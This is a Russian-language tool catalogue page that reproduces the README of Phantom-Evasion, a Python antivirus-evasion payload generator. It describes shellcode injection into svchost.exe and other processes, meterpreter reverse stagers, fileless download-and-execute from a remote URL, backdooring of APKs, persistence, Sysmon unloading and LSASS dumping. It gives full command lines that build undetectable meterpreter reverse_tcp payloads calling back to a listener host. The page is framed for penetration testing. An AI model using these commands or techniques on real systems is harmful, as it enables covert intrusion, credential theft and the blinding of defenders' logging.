Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Phantom-Evasion — Инструмент на Python для обхода антивируса | Kitploit
Инструменты/GitHubGitHub/oddcod3/phantom-evasion
Повышение привилегийДинамический анализ (песочница)Фреймворки для эксплойтовГенерация полезной нагрузкиМеханизмы персистентностиШелл-кодПост-эксплуатацияГенерация ШеллкодаРазработка Полезной НагрузкиArchived
GitHuboddcod3/phantom-evasion

Phantom-Evasion

1.4k34062 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Инструмент на Python для обхода антивируса

Репозиторий

PHANTOM EVASION 3.0

Phantom-Evasion — это инструмент для обхода антивирусов, написанный на Python (совместим как с python, так и с python3), способный генерировать (почти) полностью необнаруживаемые исполняемые файлы даже с самыми распространёнными полезными нагрузками x86 msfvenom.

Следующие ОС официально поддерживают автоматическую установку:

  1. Kali Linux
  2. Parrot Security

Следующие ОС, вероятно, поддерживают автоматическую установку, но требуют ручной установки metasploit-framework:

  1. OSX (проверено на Catalina)
  2. Ubuntu
  3. Linux Mint
  4. Elementary
  5. Deepin
  6. другие дистрибутивы Debian
  7. Centos
  8. Fedora
  9. Blackarch

Следующие ОС требуют ручной настройки:

  1. Windows 10

Просто клонируйте репозиторий Git или скачайте и распакуйте папку Phantom-Evasion.

Установка:

Автоматическая установка: откройте терминал и выполните:

root@kitploit:~
python3 phantom-evasion.py --setup

или:

root@kitploit:~
chmod +x ./phantom-evasion.py

./phantom-evasion.py --setup

или запустите phantom-evasion в интерактивном режиме и выберите опцию 7.

Зависимости (только для ручной установки)

  1. metasploit-framework
  2. mingw-w64 (cygwin в Windows)
  3. gcc-multilib
  4. apktool
  5. apksigner
  6. strip
  7. osslsigncode

КОМАНДНАЯ СТРОКА / ИНТЕРАКТИВ:

  1. Запуск phantom-evasion в интерактивном режиме:
root@kitploit:~
python3 phantom-evasion.py

или:

root@kitploit:~
./phantom-evasion.py
  1. Чтобы увидеть параметры командной строки:
root@kitploit:~
python3 phantom-evasion.py --help

или:

root@kitploit:~
./phantom-evasion.py --help

МОДУЛИ ДЛЯ WINDOWS

  • Каждый модуль полезной нагрузки Windows на C может быть скомпилирован (поддерживаются x86 и x64) как EXE или DLL/ReflectiveDLL.

  • Внедрение случайного мусорного кода (интенсивность, частота и вероятность повторного внедрения могут быть заданы) и методы обхода антивирусов Windows (частота может быть задана).

  • Поддерживается многобайтовое XOR/шифрование Vigenere шелл-кода/файла в модулях внедрения шелл-кода и Download Exec.

  • Поддерживается техника Ntdll unhookapi и маскировка процесса через PEB.

  • Широкий спектр режимов выполнения (как локальных, так и удалённых).

  • Широкий спектр режимов выделения памяти для полезной нагрузки (Virtual_RWX, Virtual_RW/RX, Virtual_RW/RWX, Heap_RWX).

  • Можно установить динамическую загрузку Windows API.

  • Поддерживается подделка и подпись сертификатов.

  • Утилита strip (https://en.wikipedia.org/wiki/Strip_(Unix))

Внедрение шелл-кода Windows на C

Поддерживаются полезные нагрузки Windows msfvenom и пользовательские шелл-коды. Шелл-код может быть сохранён как ресурс и получен во время выполнения с помощью API FindResource.

Поддерживаемое шифрование шелл-кода:

root@kitploit:~
1. none

2. Multibyte-Xor

3. Double-key Multibyte-Xor

4. Vigenere

5. Double-key Vigenere
  1. Локальный метод выполнения может быть одним из следующих:

    Thread

    APC

    Локальный режим выделения памяти может быть одним из следующих:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

  2. Удалённый метод выполнения может быть одним из следующих:

    ThreadExecutionHijack (сокращённо TEH)

    Processinject (сокращённо PI)

    APCSpray (сокращённо APCS)

    EarlyBird (сокращённо EB)

    EntryPointHijack (сокращённо EPH)

    Удалённый режим выделения памяти может быть одним из следующих:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

Cтейгеры meterpreter на чистом C для Windows (C)

Модули стейгеров meterpreter на чистом C (TCP/HTTP/HTTPS), совместимые с msfconsole и Cobalt Strike beacon (reverse_tcp/reverse_http/reverse_https).

При использовании командной строки:

root@kitploit:~
reverse_tcp c stager имеет обозначение WRT

reverse_http c stager имеет обозначение WRH

reverse_https c stager имеет обозначение WRS
  1. Локальный метод выполнения может быть одним из следующих:

    Thread

    APC

    Локальный режим выделения памяти может быть одним из следующих:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

Windows Download-Exec без записи на диск

Загрузка exe/dll по указанному URL в память и выполнение/загрузка в удалённый процесс (без записи на диск).

Поддерживается загрузка зашифрованных EXE/DLL:

root@kitploit:~
1. none
                                 
2. Multibyte-Xor
                                 
3. Double-key Multibyte-Xor
                               
4. Vigenere
                                
5. Double-key Vigenere

Зашифрованный DLL/EXE будет сохранён как originalfilename + "crypt" + ".dll" или ".exe" — это тот файл, который нужно скачать.

  1. Windows DownloadExecExe без записи на диск (обозначение в командной строке WDE):

    Удалённый метод выполнения может быть одним из следующих:

    ProcessHollowing (сокращённо PH)

  2. Windows DownloadExecDll без записи на диск (обозначение в командной строке WDD):

    Удалённый метод загрузки может быть одним из следующих:

    ReflectiveDll (сокращённо RD)

    RDAPC (ReflectiveDllAPC)

    ManualMap (сокращённо MM) ---> только x86

ПОЛЕЗНЫЕ НАГРУЗКИ ДЛЯ LINUX

Модуль внедрения шелл-кода для Linux (C)

Поддерживаются полезные нагрузки Linux msfvenom и пользовательские шелл-коды.

ПОЛЕЗНЫЕ НАГРУЗКИ ДЛЯ ANDROID

  1. Android Msfvenom Obfuscate Backdoor:

    Обфускация полезных нагрузок msfvenom и пересборка (smali/baksmali) с помощью apktool. Обфусцированная полезная нагрузка может использоваться для бэкдоринга безвредных APK-файлов.

МОДУЛИ ПЕРСИСТЕНТНОСТИ

  1. Windows Persistence RegCreateKeyExW Add Registry Key (C) Скомпилированный исполняемый файл необходимо загрузить на целевой компьютер и выполнить, указав полный путь к файлу для добавления в автозагрузку в качестве аргумента.

  2. Windows Persistence REG Add Registry Key (CMD) Этот модуль генерирует полезные нагрузки командной строки для персистентности (добавление ключа реестра через REG.exe).

  3. Windows Persistence Keep Process Alive (C) Скомпилированный исполняемый файл необходимо загрузить на целевой компьютер и выполнить. Использует CreateToolSnapshoot, ProcessFirst и ProcessNext для проверки, жив ли указанный процесс каждые X секунд (если нет, создаёт новый процесс с помощью API WinExec).

  4. Windows Persistence Schtasks (CMD)

    Этот модуль генерирует полезные нагрузки командной строки для персистентности (с помощью Schtasks.exe).

  5. Windows Persistence Create Service (CMD)

    Этот модуль генерирует полезные нагрузки командной строки для персистентности (с помощью sc.exe).

МОДУЛИ ПОВЫШЕНИЯ ПРИВИЛЕГИЙ

  1. Windows DuplicateTokenEx (C)

    Создаёт новый процесс с токеном, клонированным из другого процесса. Скомпилированный исполняемый файл необходимо загрузить на целевой компьютер и выполнить.

МОДУЛИ ПОСТЭКСПЛУАТАЦИИ

  1. Windows Unload Sysmon (C) Выгружает драйвер sysmon, что приводит к остановке записи журналов событий sysmon. Скомпилированный исполняемый файл необходимо загрузить на целевой компьютер и выполнить.

  2. Windows Unload Sysmon (CMD) Выгружает драйвер sysmon, что приводит к остановке записи журналов событий sysmon.

  3. Windows Attrib hide file (CMD) Использует attrib для скрытия файла

  4. Windows SetFileAttribute hidden (C) Скрывает файл с помощью API SetFileAttribute Скомпилированный исполняемый файл необходимо загрузить на целевой компьютер и выполнить.

  5. Windows DumpLsass (C) Снимает дамп Lsass с помощью API MiniWriteDumpWrite. Скомпилированный исполняемый файл необходимо загрузить на целевой компьютер и выполнить.

  6. Windows DumpLsass (CMD)

    Снимает дамп Lsass из командной строки.

Примеры использования командной строки Phantom-Evasion:

  1. Внедрение шелл-кода Windows, вывод подписанного exe с поддельным сертификатом HTTPS, локальный метод выполнения: Thread, память: Virtual_RWX, шифрование: vigenere
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 192.168.1.123 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o filename.exe
  1. Внедрение шелл-кода Windows x64, вывод как рефлексивная DLL, удалённый метод выполнения: ProcessInject (PI), память: Virtual_RW/RX, целевой процесс: SkypeApp.exe, шифрование: двойной ключ xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp SkypeApp.exe -i PI -e 3 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -R -o filename.dll
  1. Внедрение шелл-кода Windows x64, вывод как stripped DLL, шелл-код сохранён как ресурс, удалённый метод выполнения: EarlyBird (EB), память: Virtual_RW/RX, целевой процесс: svchost.exe, шифрование: xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp svchost.exe -i EB -e 2 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -res -S -o filename.dll
  1. Стейгер reverse https Windows x64, вывод как stripped DLL, локальный метод выполнения: Thread, память: Heap_RWX
root@kitploit:~
python3 phantom-evasion.py -m WRS -a x64 -H 192.168.1.123 -P 4444 -i Thread -mem Heap_RWX -j 1 -J 15 -jr 0 -E 5 -f dll -S -o filename.dll
  1. Windows x86 downloadexec dll, вывод как stripped exe, удалённый метод выполнения: ManualMap (MM), целевой процесс: OneDrive.exe, размер загрузки 1000000 байт
root@kitploit:~
python3 phantom-evasion.py -m WDD -U http://192.168.1.123/payload.dll -i MM -tp OneDrive.exe -ds 1000000  -j 10 -J 10 -jr 0 -E 10 -f exe -S -o filename.exe

  1. Windows x64 downloadexec exe, вывод как stripped рефлексивная DLL, удалённый метод выполнения: ProcessHollowing (PH), целевой процесс: svchost.exe, размер загрузки 1000000 байт
root@kitploit:~
python3 phantom-evasion.py -m WDE -U http://192.168.1.123/payloadcrypt.exe -e 4 -ef payload.exe -i PH -tp svchost.exe -ds 1000000  -j 1 -J 5 -jr 0 -E 3 -f dll -R -S -o filename.dll

Лицензия

GPLv3.0

Благодарности и полезные ресурсы

https://github.com/stephenfewer/ReflectiveDLLInjection

https://github.com/rsmudge/metasploit-loader

https://ired.team

https://github.com/theevilbit/injection

http://www.rohitab.com/discuss/topic/40761-manual-dll-injection/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf

Скачать инструмент